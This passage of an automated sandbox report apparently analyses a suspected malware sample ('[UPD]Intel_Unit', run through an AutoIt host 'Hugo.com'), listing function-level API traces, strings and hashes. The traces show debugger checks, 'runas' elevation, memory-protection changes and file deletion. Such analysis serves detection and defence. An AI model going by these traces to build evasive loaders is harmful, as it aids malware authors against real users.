Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: Hugo.comPID: 6596, Parent PID: 5128COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	59

Executed Functions

Function 00F15FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00F15FF7

Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A

GetCurrentProcess.KERNEL32(?,00FADC2C,00000000,?,?), ref: 00F16123
IsWow64Process.KERNEL32(00000000,?,?), ref: 00F1612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00F16155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F16167
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00F16175
FreeLibrary.KERNEL32(00000000,?,?), ref: 00F1617C
GetSystemInfo.KERNEL32(?,?,?), ref: 00F161A1

Strings

kernel32.dll, xrefs: 00F16150
|O, xrefs: 00F550F7
GetNativeSystemInfo, xrefs: 00F16161

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 9904250540316ef5d4d30aa7faa2712a12f5bd1fa9a0bad3ff28aee28327bbfd
Instruction ID: 1eee64342e6733e34030ccc483a360888399ee2ade778cd2bb8b13b11c2aa0b8
Opcode Fuzzy Hash: 9904250540316ef5d4d30aa7faa2712a12f5bd1fa9a0bad3ff28aee28327bbfd
Instruction Fuzzy Hash: 1DA1C76280A6CCDFC751CBBC7CC21D97F5C6B26714B084899D481AF222E66D4588FF32

Function 00F1338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00F13368,?), ref: 00F133BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00F13368,?), ref: 00F133CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00FE2418,00FE2400,?,?,?,?,?,?,00F13368,?), ref: 00F1343A

Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A

Part of subcall function 00F1425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F13462,00FE2418,?,?,?,?,?,?,?,00F13368,?), ref: 00F142A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00FE2418,?,?,?,?,?,?,?,00F13368,?), ref: 00F134BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00F53CB0
SetCurrentDirectoryW.KERNEL32(?,00FE2418,?,?,?,?,?,?,?,00F13368,?), ref: 00F53CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00FD31F4,00FE2418,?,?,?,?,?,?,?,00F13368), ref: 00F53D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00F53D81

Part of subcall function 00F134D3: GetSysColorBrush.USER32(0000000F), ref: 00F134DE
Part of subcall function 00F134D3: LoadCursorW.USER32(00000000,00007F00), ref: 00F134ED
Part of subcall function 00F134D3: LoadIconW.USER32(00000063), ref: 00F13503
Part of subcall function 00F134D3: LoadIconW.USER32(000000A4), ref: 00F13515
Part of subcall function 00F134D3: LoadIconW.USER32(000000A2), ref: 00F13527
Part of subcall function 00F134D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F1353F
Part of subcall function 00F134D3: RegisterClassExW.USER32(?), ref: 00F13590

Part of subcall function 00F135B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F135E1
Part of subcall function 00F135B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F13602
Part of subcall function 00F135B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00F13368,?), ref: 00F13616
Part of subcall function 00F135B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00F13368,?), ref: 00F1361F

Part of subcall function 00F1396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F13A3C

Strings

runas, xrefs: 00F53D75
AutoIt, xrefs: 00F53CA5
It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 00F53CAA

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
API String ID: 683915450-2030392706
Opcode ID: d41b6eb1fd1b6ceb0f21763417fe0d280082e8d487be735a6641792e986e1855
Instruction ID: ceba76bc5b0e03cc5ded8f5b5c1edb8e972a0ee6cfca599331bb93a9bb1064ba
Opcode Fuzzy Hash: d41b6eb1fd1b6ceb0f21763417fe0d280082e8d487be735a6641792e986e1855
Instruction Fuzzy Hash: 74513871108388AEC701EF649C55DEE7BBDAF85750F04042DF582961E3EB688A89F723

Function 00F7DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F155D1,?,?,00F54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F15871

Part of subcall function 00F7EAB0: GetFileAttributesW.KERNEL32(?,00F7D840), ref: 00F7EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00F7DCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 00F7DD1B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F7DD2C
FindClose.KERNEL32(00000000), ref: 00F7DD43
FindClose.KERNEL32(00000000), ref: 00F7DD4C

Strings

\*.*, xrefs: 00F7DC9D

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 4c897783ea5c567e9e019cdf1700ec591cc9b8dab3ccab1ab775a7c81276f486
Instruction ID: 67dca0af6f20087a2bdca4e61d5c476fe36ad09f94e03e88b9d99946c9d222e4
Opcode Fuzzy Hash: 4c897783ea5c567e9e019cdf1700ec591cc9b8dab3ccab1ab775a7c81276f486
Instruction Fuzzy Hash: 4D315E31408345DBC315EB60DC919EFB7E8BE96310F80495EF4D682191EB25DA49EB63

Function 00F7DD87 Relevance: 6.1, APIs: 4, Instructions: 86
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00F7DDAC
Process32FirstW.KERNEL32(00000000,?), ref: 00F7DDBA
Process32NextW.KERNEL32(00000000,?), ref: 00F7DDDA
CloseHandle.KERNEL32(00000000), ref: 00F7DE87

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ed29cf76839296eefb8d678d0822bb2b6c21e1140768f72ee90a4ebacdb812e3
Instruction ID: f1505234758cee6501dffd09a0e3db092b41f2eab16e7ea6c7d6bdc01c6120b4
Opcode Fuzzy Hash: ed29cf76839296eefb8d678d0822bb2b6c21e1140768f72ee90a4ebacdb812e3
Instruction Fuzzy Hash: 1C317E71108301DFD311EF50DC85AABBBF8AF99350F44092EF586871A1DB719985DB93

Function 00F2FFE0 Relevance: 3.1, APIs: 2, Instructions: 94nativeCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00F3007D
NtProtectVirtualMemory.NTDLL ref: 00F3008F

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CloseHandleMemoryProtectVirtual
String ID:
API String ID: 2407445808-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 7983d66011a916c20449f3ed22104b253262333c8a3694c9222060fbd777db62
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 4C31D9B1A00105DFC718CF58D4A0B69FBA5FB49320F2486A6E449CB252DB31EDC1EBC0

Function 00F1EE50 Relevance: 21.6, APIs: 14, Instructions: 613windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00F1EF07
timeGetTime.WINMM ref: 00F1F107
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1F228
TranslateMessage.USER32(?), ref: 00F1F27B
DispatchMessageW.USER32(?), ref: 00F1F289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1F29F
Sleep.KERNEL32(0000000A), ref: 00F1F2B1

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 6fd0c35f8f184c4013e9e376ef45ae4fba0bd60b5e3cf7fe4e7041a0d4aeb98b
Instruction ID: 2c2763ed7aaf13cbcfdb2706d683b83568a64471d2ddf57d1edf498ab6094582
Opcode Fuzzy Hash: 6fd0c35f8f184c4013e9e376ef45ae4fba0bd60b5e3cf7fe4e7041a0d4aeb98b
Instruction Fuzzy Hash: B9322670A04346EFD728DF24C884BAAB7E4BF85324F14452DF85687291C775E988FB82

Function 00F13624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F13657
RegisterClassExW.USER32(00000030), ref: 00F13681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F13692
InitCommonControlsEx.COMCTL32(?), ref: 00F136AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F136BF
LoadIconW.USER32(000000A9), ref: 00F136D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F136E4

Strings

AutoIt v3 GUI, xrefs: 00F13673
0, xrefs: 00F13639
TaskbarCreated, xrefs: 00F13687
+, xrefs: 00F13640

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 074fc9bee8c6744e1162bb8e89ca7236c4e27d9954ed2519cd8f1e6aaf270bb2
Instruction ID: 4a4d05ec25867b154000cf4f88c7a311972edd08e203a9b8a88821e0b18f6306
Opcode Fuzzy Hash: 074fc9bee8c6744e1162bb8e89ca7236c4e27d9954ed2519cd8f1e6aaf270bb2
Instruction Fuzzy Hash: 0421E3B1D0125CAFDB44DFA4E889ADDBBB8FB09710F00511AF512AA2A1E7B44540AF90

Function 00F509DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F5071A: CreateFileW.KERNEL32(00000000,00000000,?,00F50A84,?,?,00000000,?,00F50A84,00000000,0000000C), ref: 00F50737

GetLastError.KERNEL32 ref: 00F50AEF
__dosmaperr.LIBCMT ref: 00F50AF6
GetFileType.KERNEL32(00000000), ref: 00F50B02
GetLastError.KERNEL32 ref: 00F50B0C
__dosmaperr.LIBCMT ref: 00F50B15
CloseHandle.KERNEL32(00000000), ref: 00F50B35
CloseHandle.KERNEL32(?), ref: 00F50C7F
GetLastError.KERNEL32 ref: 00F50CB1
__dosmaperr.LIBCMT ref: 00F50CB8

Strings

H, xrefs: 00F50C3D

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: a5afe3eeecdbb97efc381ea0c28a4e570727914dc870505b9f2964cb7502f13a
Instruction ID: 87bc9ed49e7423d075db94aac92366d24e1de8b11c50d978681b5b6f452c642e
Opcode Fuzzy Hash: a5afe3eeecdbb97efc381ea0c28a4e570727914dc870505b9f2964cb7502f13a
Instruction Fuzzy Hash: 93A12732E042489FDF19AF68DC92BAE3BA0EB46325F140159FD11DF291DB359C06EB91

Function 00F152A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F15594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00F54B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00F155B2

Part of subcall function 00F15238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F1525A

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F153C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F54BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F54C3E
RegCloseKey.ADVAPI32(?), ref: 00F54C80
_wcslen.LIBCMT ref: 00F54CE7
_wcslen.LIBCMT ref: 00F54CF6

Strings

\, xrefs: 00F54CFC
Software\AutoIt v3\AutoIt, xrefs: 00F153BA
Include, xrefs: 00F54BF4, 00F54C35
\Include\, xrefs: 00F15381

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 57a227de1b5840036b678ecc2799afa101d9eec519fcf3de5a49da312f97ebc8
Instruction ID: b15a07c402411178d9fa003f84afc33c3c272b5ba870ea41f4852cb3ad4a9a7e
Opcode Fuzzy Hash: 57a227de1b5840036b678ecc2799afa101d9eec519fcf3de5a49da312f97ebc8
Instruction Fuzzy Hash: 8B71AE715043459EC304EF65EC89DABBBE8FF88350F80442EF541CB1A1DB759A89EB62

Function 00F134D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F134DE
LoadCursorW.USER32(00000000,00007F00), ref: 00F134ED
LoadIconW.USER32(00000063), ref: 00F13503
LoadIconW.USER32(000000A4), ref: 00F13515
LoadIconW.USER32(000000A2), ref: 00F13527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F1353F
RegisterClassExW.USER32(?), ref: 00F13590

Part of subcall function 00F13624: GetSysColorBrush.USER32(0000000F), ref: 00F13657
Part of subcall function 00F13624: RegisterClassExW.USER32(00000030), ref: 00F13681
Part of subcall function 00F13624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F13692
Part of subcall function 00F13624: InitCommonControlsEx.COMCTL32(?), ref: 00F136AF
Part of subcall function 00F13624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F136BF
Part of subcall function 00F13624: LoadIconW.USER32(000000A9), ref: 00F136D5
Part of subcall function 00F13624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F136E4

Strings

0, xrefs: 00F1355F
AutoIt v3, xrefs: 00F1357F
#, xrefs: 00F13566

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: c2780817dc28e1cbbe8ea4f5e99da47421062b85c116709e1d3a5cc4dc0896fb
Instruction ID: 403601b9c285dbe69ed7722f131b51eb6766f89b8dfe2b2944d822a8b4577e88
Opcode Fuzzy Hash: c2780817dc28e1cbbe8ea4f5e99da47421062b85c116709e1d3a5cc4dc0896fb
Instruction Fuzzy Hash: 082153B0D4039CAFDB509F95EC95B997FB8FB08750F00001AF605AA260E7B90544EF90

Function 00F90FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00F91019
inet_addr.WSOCK32(?), ref: 00F91079
gethostbyname.WS2_32(?), ref: 00F91085
IcmpCreateFile.IPHLPAPI ref: 00F91093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F91123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F91142
IcmpCloseHandle.IPHLPAPI(?), ref: 00F91216
WSACleanup.WSOCK32 ref: 00F9121C

Strings

Ping, xrefs: 00F910D3

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 5c07e271cc092deb4b3295118e12ab78c53050355cf2f5ade310193685a58fcf
Instruction ID: 51344fd676ad851d56b798aa8392d2b4e1fd593452785ed8aba5660c72970e51
Opcode Fuzzy Hash: 5c07e271cc092deb4b3295118e12ab78c53050355cf2f5ade310193685a58fcf
Instruction Fuzzy Hash: 7E91B471A04202AFEB20DF15C884F16BBE4FF45328F1485A9F5658B6A2C735ED85DB81

Function 00F1370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00F13709,?,?), ref: 00F13777
KillTimer.USER32(?,00000001,?,?,?,?,?,00F13709,?,?), ref: 00F137A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F137C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00F13709,?,?), ref: 00F137D1
CreatePopupMenu.USER32 ref: 00F137E5
PostQuitMessage.USER32(00000000), ref: 00F13806

Strings

TaskbarCreated, xrefs: 00F137CC

Memory Dump Source

